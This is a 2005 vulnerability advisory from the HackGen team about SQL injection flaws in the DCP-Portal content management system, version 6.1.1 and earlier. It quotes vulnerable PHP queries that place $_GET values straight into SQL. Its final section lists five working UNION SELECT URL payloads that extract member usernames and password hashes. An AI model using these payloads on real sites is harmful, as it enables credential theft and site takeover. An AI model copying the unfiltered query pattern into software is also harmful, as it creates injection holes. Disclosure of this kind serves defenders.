http://www.hackgen.org/advisories/hackgen-2005-003.txt '''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''' ' [hackgen-2005-#003] ' '''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''' ' SQL injection bugs in DCP-Portal ' '''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''' Software: DCP-Portal <= 6.1.1 Homepage: http://www.dcp-portal.org Author: "Exoduks" - HackGen Team Release Date: 16 March, 2005 Website: www.hackgen.org Mail: exoduks [at] gmail . com 0x01 - Affected software description: ------------------------------------- DCP-Portal is a content management system with advanced features like web based update, link, file, member management, poll, calendar, content informer, content sending by members etc. Features: Admin panel to manage the entire site; HTML editor to add news and content; Members can submit news and contents, and write reviews; Members can receive the added content in e-mail; Mailing list; Search engine; Content categories; FAQ; Easy setup; Multi-language support; Forum; Message system; member agenda; Ad management. Site design can be changed with just one template file, publish in homepage option, .txt file import for contents, featured module, works with register_globals=off.. 0x02 - Vulnerability Discription: --------------------------------- Vulnerabilities exist in prety much all sql queries, some of them are in index.php and forums.php. There isn't eny filtering for input string in all $_GET and $_POST variables. So it is possible to input evil sql query that will give us for example hashed password of user we want. This bug is very critical because we can get and admin password. So some evil user deface portal, or delate all database. This can be exploited if magic_quotes_gpc is set to Off in php.ini 0x03 - Vulnerability Code: -------------------------- Vulnerability code in index.php ----- beging the code in index.php ----- .... $result = mysql_query("SELECT * FROM $t_members WHERE uid = '".$_GET["uid"]."' AND hideinfo != '1' ORDER BY username"); .... $sql = mysql_query("SELECT id, name, content FROM $t_faq WHERE cat_id = '".$_GET["lcat"]."' ORDER BY name"); .... $sql = mysql_query("SELECT id, name FROM $t_links WHERE cat_id = '".$_GET["lcat"]."' ORDER BY name"); .... $result = mysql_query("SELECT * FROM $t_docs WHERE cat_id = '".$_GET["dcat"]."' AND active = '1' ORDER BY date DESC"); .... ----- end of the code ----- Vulnerability code in forums.php ----- beging the code in forums.php ----- .... $result = mysql_query("SELECT * FROM $t_forums WHERE fid = '".$_GET["bid"]."'"); .... $result = mysql_query("SELECT * FROM $t_forum_msg WHERE tid = '".$_GET["mid"]."'"); .... ----- end of the code ----- 0x04 - How to fix this bug: --------------------------- Vendor has beed contacted and he we probably publish new version of portal so go to http://www.dcp-portal.org and look for new version. 0x05 - Exploit: ---------------- http://server.com/index.php?page=links&catid=1&lcat=-99%27 UNION SELECT null,password FROM dcp5_members WHERE username=%27[username] http://server.com/index.php?page=documents&doc=-99%27 UNION SELECT null,null,username,password, null,null,null,null,null,null,null,null FROM dcp5_members WHERE username=%27[username] http://server.com/index.php?page=mdetails&uid=-99%27 UNION SELECT null,null,null,username,null, null,null,null,password,null,null,null,null,null,null,null,null,null,null,null,null FROM dcp5_members WHERE username=%27[username] http://server.com/forums.php?action=showmsg&mid=-99%27 UNION SELECT null,null,null,password,null, username,null,null,null FROM dcp5_members WHERE username=%27[username] http://server.com/forums.php?action=board&bid=-99%27UNION SELECT null,null,password,null FROM dcp5_members WHERE username=%27[username] Replace [username] with username which you want to get password for and if you need change dcp5_ prefix. I have tested this on DCP-Portal v6.1.1 and it works ! 0x006 - The End: ---------------- And you have come to end. My threed advisor is out. Grejtttzz to: All people who are working on phearless zine which can be readed on http://phearless.headcoders.net ______________________________________ Written By Exoduks - www.hackgen.org